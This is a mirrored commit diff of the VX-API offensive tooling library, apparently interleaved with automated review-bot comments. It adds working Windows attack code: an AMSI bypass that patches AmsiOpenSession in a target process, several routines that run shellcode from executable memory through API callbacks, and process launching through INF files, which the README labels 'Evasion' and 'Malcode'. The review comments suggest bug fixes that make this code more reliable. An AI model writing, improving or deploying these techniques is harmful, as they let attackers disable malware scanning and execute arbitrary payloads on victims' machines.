mirror of https://github.com/vxunderground/VX-API
parent
9d8a2f2801
commit
08fc458393
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.642
|
||||
Version: 2.0.658
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -99,6 +99,10 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| RemoveRegisterDllNotification | Rad98, Peter Winter-Smith | Evasion |
|
||||
| CreateProcessByWindowsRHotKey | smelly__vx | Evasion |
|
||||
| CreateProcessByWindowsRHotKeyEx | smelly__vx | Evasion |
|
||||
| AmsiBypassViaPatternScan | ZeroMemoryEx | Evasion |
|
||||
| CopyFileViaSetupCopyFile | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -204,6 +208,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfSceViaClusWorkerCreate | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumProcesses | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaImageGetDigestStream | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaVerifierEnumerateResource | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumSourceFiles | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
|
|
@ -0,0 +1,70 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
typedef HRESULT(WINAPI* AMSIOPENSESSION)(HAMSICONTEXT, HAMSISESSION*);
|
||||
|
||||
BYTE AmsiPattern[] = { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33 };
|
||||
UCHAR AmsiPatch[] = { 0xeb };
|
||||
|
||||
ULONGLONG UnusedSubroutineSearchAmsiPattern(PBYTE Address, DWORD Size, PBYTE Pattern, DWORD PatternSize)
|
||||
{
|
||||
for (DWORD dwX = 0; dwX < 1024; dwX++)
|
||||
{
|
||||
if (Address[dwX] == Pattern[0])
|
||||
{
|
||||
DWORD dwOffset = 1;
|
||||
while (dwOffset < PatternSize && dwX + dwOffset < Size && (Pattern[dwOffset] == '?' || Address[dwX + dwOffset] == Pattern[dwOffset]))
|
||||
{
|
||||
dwOffset++;
|
||||
}
|
||||
|
||||
if (dwOffset == PatternSize)
|
||||
return (dwX + 3);
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
AMSIOPENSESSION pfnAmsiOpenSession = NULL;
|
||||
BYTE AmsiBuffer[1024] = { 0 };
|
||||
ULONGLONG AmsiAddress = 0LL, PatchedAmsiAddress = 0LL;
|
||||
|
||||
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
|
||||
if (hProcess == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"amsi.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
pfnAmsiOpenSession = (AMSIOPENSESSION)GetProcAddressA((DWORD64)hMod, "AmsiOpenSession");
|
||||
if (!pfnAmsiOpenSession)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadProcessMemory(hProcess, pfnAmsiOpenSession, &AmsiBuffer, 1024, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
AmsiAddress = UnusedSubroutineSearchAmsiPattern(AmsiBuffer, sizeof(AmsiBuffer), AmsiPattern, sizeof(AmsiPattern));
|
||||
if (AmsiAddress == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PatchedAmsiAddress = (ULONGLONG)pfnAmsiOpenSession;
|
||||
PatchedAmsiAddress += AmsiAddress;
|
||||
|
||||
if (!WriteProcessMemory(hProcess, (LPVOID)PatchedAmsiAddress, AmsiPatch, 1, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hProcess)
|
||||
CloseHandle(hProcess);
|
||||
|
||||
return bFlag;
|
||||
}
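Review bot: `UnusedSubroutineSearchAmsiPattern` never uses its `Size` parameter in the outer loop — `for (DWORD dwX = 0; dwX < 1024; dwX++)` indexes `Address[dwX]` up to the hard-coded 1024 whatever buffer the caller passed, so any caller with a smaller buffer over-reads; change it to `dwX < Size` (the inner `while` already bounds by `Size`). The returned `dwX + 3` is an undocumented offset relative to the match; a one-line comment stating what it points at is needed for a maintainer to re-derive it when the pattern changes. `hMod` from `LoadLibraryW(L"amsi.dll")` is never released, while the sibling files in this commit call `FreeLibrary` in `EXIT_ROUTINE`. The literal `1024` in the `ReadProcessMemory` call should be `sizeof(AmsiBuffer)` so the two cannot drift apart.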
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
|
||||
{
|
||||
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
|
||||
}
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
|
||||
{
|
||||
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR wDestination[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(wSource, (PCHAR)Source, StringLengthA(Source) * sizeof(WCHAR)) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (CharStringToWCharString(wDestination, (PCHAR)Destination, StringLengthA(Destination) * sizeof(WCHAR)) == 0)
|
||||
return FALSE;
|
||||
|
||||
return SetupDecompressOrCopyFileW(wSource, wDestination, FILE_COMPRESSION_NONE);
|
||||
}
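Review bot: `SetupDecompressOrCopyFileW` returns a `DWORD` Win32 error code where `NO_ERROR` (0) means success, so returning it straight through a `BOOL` function at L305 and L343 reports a successful copy as `FALSE` and a failed one as `TRUE`; use `return SetupDecompressOrCopyFileW(Source, Destination, NULL) == NO_ERROR;`. Its third parameter is declared `PUINT CompressionType`, so the integer `FILE_COMPRESSION_NONE` only compiles because it expands to 0 and becomes a null pointer (which makes the API detect the type itself); to force an uncompressed copy, pass the address of a `UINT` holding that value. In the A variant the length handed to `CharStringToWCharString` is derived from the input (`StringLengthA(Source) * sizeof(WCHAR)`) rather than from the capacity of `wSource`, so a path longer than the stack buffer could overflow it, depending on how that helper interprets its third argument — which isn't visible here. `WCHAR wSource[MAX_PATH * sizeof(WCHAR)]` also scales an element count by `sizeof(WCHAR)`; `MAX_PATH` elements is presumably what was meant.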
|
||||
|
|
@ -0,0 +1,115 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
[version]
|
||||
signature = $Chicago$
|
||||
AdvancedInf = 2.5
|
||||
|
||||
[DefaultInstall_SingleUser]
|
||||
RunPostSetupCommands = Tag1
|
||||
|
||||
[Tag1]
|
||||
C:\Windows\system32\calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
|
||||
LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
|
||||
if (!LaunchINFSectionW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L"1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
|
||||
LAUNCHINFSECTION LaunchINFSection = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
|
||||
if (!LaunchINFSection)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, "1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
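Review bot: `InfExecutionBuffer` holds `MAX_PATH * 2` characters but is filled by unbounded `StringCopyW`/`StringConcatW` calls from the caller-supplied `PathToInfFile` and `NameOfSection` (L460–L500, and the A variant at L587–L627) with no length check, so an over-long path or section name overflows the stack buffer. A guard before the first copy such as `if (StringLengthA(PathToInfFile) + StringLengthA(NameOfSection) + 4 >= sizeof(InfExecutionBuffer)) goto EXIT_ROUTINE;` in the A variant, and the equivalent wide-character check in the W variant, closes that (the `+ 4` accounts for the three commas and the `1`). The two functions are otherwise line-for-line copies; converting in the A variant and delegating to the W variant, as `CopyFileViaSetupCopyFileA` in this commit does, would keep the fix in one place.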
|
|
@ -0,0 +1,56 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#define RSC_FLAG_INF 1
|
||||
#define RSC_FLAG_QUIET 4
|
||||
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNSETUPCOMMANDW)(HWND, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, PHANDLE, DWORD, LPVOID);
|
||||
RUNSETUPCOMMANDW RunSetupCommandW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
|
||||
RunSetupCommandW = (RUNSETUPCOMMANDW)GetProcAddressA((DWORD64)hMod, "RunSetupCommandW");
|
||||
if (!RunSetupCommandW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(RunSetupCommandW(NULL, PathToInfFile, NameOfSection, L".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNSETUPCOMMANDA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, PHANDLE, DWORD, LPVOID);
|
||||
RUNSETUPCOMMANDA RunSetupCommandA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
|
||||
RunSetupCommandA = (RUNSETUPCOMMANDA)GetProcAddressA((DWORD64)hMod, "RunSetupCommandA");
|
||||
if (!RunSetupCommandA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(RunSetupCommandA(NULL, PathToInfFile, NameOfSection, ".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
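Review bot: `hMod` from `LoadLibraryW(L"advpack.dll")` at L703 (and L773 in the A variant) is passed straight to `GetProcAddressA((DWORD64)hMod, ...)` with no NULL check, unlike the sibling `CreateProcessFromINFSectionInstallStringNoCab` in this commit, which bails out; add `if (hMod == NULL) goto EXIT_ROUTINE;` after each load. Whether the project's own `GetProcAddressA` tolerates a zero module base isn't visible here, so the check should not be delegated to it. `RSC_FLAG_INF`/`RSC_FLAG_QUIET` are redefined locally with `#define`; if `advpub.h` (which declares them) is ever pulled into `Win32Helper.h`, the duplicate definitions will warn or conflict, so guard them with `#ifndef` or include that header instead.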
|
|
@ -79,4 +79,11 @@ typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
|||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
||||
|
||||
|
||||
|
||||
///*******************************************
|
||||
// IMAGEHLP IMPORT
|
||||
//*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
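Review bot: The new IMAGEHLP banner (L845–L851) is written as `///****` … `//****/`, i.e. line comments laid over block-comment delimiters, while the ADVAPI32 banner just above uses a plain `/*** … ***/` block; use the same form so the section headers stay consistent. `SYSTEMFUNCTION032` appears on both the old and new side (L833, L836) with no visible difference, which suggests a whitespace-only edit to that line that could be dropped from the commit.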
|
|
@ -65,6 +65,8 @@
|
|||
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
|
||||
#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
|
||||
|
||||
#define CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO 0x04
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
|
|
|
@ -32,7 +32,7 @@ BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
|
|||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
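Review bot: The added `(DWORD)` cast silently truncates `SizeOfTargetBinary` for any file of 4 GiB or more, and the `ReadFile` call keeps passing NULL for both `lpNumberOfBytesRead` and `lpOverlapped`, a combination the API rejects and which also leaves short reads undetected; the same applies to the A variant's hunk at L925. Replace the call with `DWORD dwBytesRead = 0;` followed by `if (SizeOfTargetBinary > MAXDWORD || !ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, &dwBytesRead, NULL) || dwBytesRead != (DWORD)SizeOfTargetBinary) goto EXIT_ROUTINE;` (the range test assumes `SizeOfTargetBinary` is a 64-bit quantity, which its declaration outside the hunk would confirm). `IsPeSectionW` begins before this hunk and continues after it.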
|
||||
|
@ -83,7 +83,7 @@ BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
|
|||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
|
||||
|
|
|
@ -2,20 +2,14 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
/*
|
||||
|
||||
This is stuff I was debugging.
|
||||
------------------------------------
|
||||
|
||||
DWORD dwSize = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
MpfSceViaImageGetDigestStream((PBYTE)Buffer, dwSize);
|
||||
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
|
||||
|
||||
------------------------------------
|
||||
*/
|
||||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
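Review bot: The harness call at L992 hard-codes an absolute path under a specific user profile (`C:\\Users\\dwThr\\Desktop\\demo.inf`) and discards the `BOOL` result, so the test neither runs on another machine nor reports failure; take the path from the command line or a relative fixture and check the result, e.g. `if (!CreateProcessFromINFSectionInstallStringNoCabA(...)) return ERROR_GEN_FAILURE;`. The commented-out debugging block and `//BOOL bFlag = AmsiBypassViaPatternScan(4288);` are dead code and belong in version history rather than in `main`.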
|
||||
|
|
|
@ -21,4 +21,6 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
|||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeChooseColorWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -7,12 +7,22 @@ VOID InvokeImageGetDigestStreamCallbackRoutine(LPVOID lpParameter)
|
|||
WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\ntdll.dll";
|
||||
HANDLE hImage = NULL;
|
||||
HANDLE hDispose = NULL;
|
||||
IMAGEGETDIGESTSTREAM ImageGetDigestStream = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
|
||||
hMod = LoadLibraryW(L"Imagehlp.dll");
|
||||
if (hMod == NULL)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream = (IMAGEGETDIGESTSTREAM)GetProcAddressA((DWORD64)hMod, "ImageGetDigestStream");
|
||||
if (!ImageGetDigestStream)
|
||||
return;
|
||||
|
||||
hImage = CreateFileW(DefaultBinaryPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hImage == INVALID_HANDLE_VALUE)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)lpParameter, &hDispose);
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, lpParameter, &hDispose);
|
||||
|
||||
if(hDispose)
|
||||
CloseHandle(hDispose);
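Review bot: `hMod` from `LoadLibraryW(L"Imagehlp.dll")` is never released on any visible path, and the early `return`s after L1059 and L1070 also leave it loaded; `hImage` is only closed if the code past the hunk does it, and the return value of `ImageGetDigestStream` is discarded. The cheapest fix is `if (!ImageGetDigestStream) { FreeLibrary(hMod); return; }` at L1059, the same pattern at L1070, and a `FreeLibrary(hMod);` next to the `CloseHandle(hDispose)` cleanup; a single `EXIT_ROUTINE:` label that closes `hImage` (when it is neither NULL nor `INVALID_HANDLE_VALUE`), closes `hDispose` and frees `hMod` would match the other files in this commit better. `WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)]` scales a character count by `sizeof(WCHAR)`; `MAX_PATH` elements is all the initializer needs. `InvokeImageGetDigestStreamCallbackRoutine` begins before this hunk and continues after it.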
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeSymEnumSourceFilesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
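Review bot: `MpfSceViaSymEnumSourceFiles` returns `TRUE` regardless of whether the worker ran — the result of `CreateThreadAndWaitForCompletion` at L1157 is discarded — and the `BinAddress` region from `VirtualAlloc` is never released, so every call leaks an executable mapping; the same shape is in `MpfSceViaVerifierEnumerateResource` (L1233–L1268). Capture whatever `CreateThreadAndWaitForCompletion` reports (its return type isn't visible here), call `VirtualFree(BinAddress, 0, MEM_RELEASE);` once the wait has completed, and return the captured value. In the callback, a failed `SymInitializeW` returns silently, so the caller cannot tell that from a completed enumeration; if that is accepted, a one-line comment on the early `return` should say so.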
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
typedef ULONG(NTAPI* AVRF_RESOURCE_ENUMERATE_CALLBACK)(PVOID ResourceDescription, PVOID EnumerationContext, PULONG EnumerationLevel);
|
||||
typedef ULONG(WINAPI* VERIFIERENUMERATERESOURCE)(HANDLE, ULONG, ULONG, AVRF_RESOURCE_ENUMERATE_CALLBACK, PVOID);
|
||||
VERIFIERENUMERATERESOURCE VerifierEnumerateResource = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
|
||||
hMod = LoadLibraryW(L"verifier.dll");
|
||||
if (hMod == NULL)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource = (VERIFIERENUMERATERESOURCE)GetProcAddressA((DWORD64)hMod, "VerifierEnumerateResource");
|
||||
if (!VerifierEnumerateResource)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeVerifierEnumerateResourceCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
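Review bot: `VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, ...)` at L1220 passes `NULL` where the local typedef (L1187) declares a `ULONG`; write `0` so the call matches the prototype the file itself defines. `hMod` for `verifier.dll` is loaded on every call and never released, and the bare `return;` at L1225 is redundant; a `FreeLibrary(hMod);` in place of that `return;`, plus one before the early `return` after the failed lookup, covers both. The `AVRF_RESOURCE_ENUMERATE_CALLBACK` and `VERIFIERENUMERATERESOURCE` typedefs are declared inside the function while the other import typedefs in this commit live in `Internal.h` (L821–L854); moving them there keeps the import table in one place.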
|
|
@ -135,6 +135,7 @@
|
|||
<ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
|
||||
<ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
|
||||
<ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
|
||||
<ClCompile Include="AmsiBypassViaPatternScan.cpp" />
|
||||
<ClCompile Include="ByteArrayToCharArray.cpp" />
|
||||
<ClCompile Include="CaplockString.cpp" />
|
||||
<ClCompile Include="CharArrayToByteArray.cpp" />
|
||||
|
@ -144,6 +145,7 @@
|
|||
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp" />
|
||||
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp" />
|
||||
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp" />
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp" />
|
||||
<ClCompile Include="CopyMemoryEx.cpp" />
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp" />
|
||||
<ClCompile Include="CreateLocalAppDataObjectPath.cpp" />
|
||||
|
@ -152,6 +154,8 @@
|
|||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
|
@ -303,6 +307,8 @@
|
|||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp" />
|
||||
<ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="ReadDataFromPeSection.cpp" />
|
||||
|
|
|
@ -753,6 +753,24 @@
|
|||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="AmsiBypassViaPatternScan.cpp">
|
||||
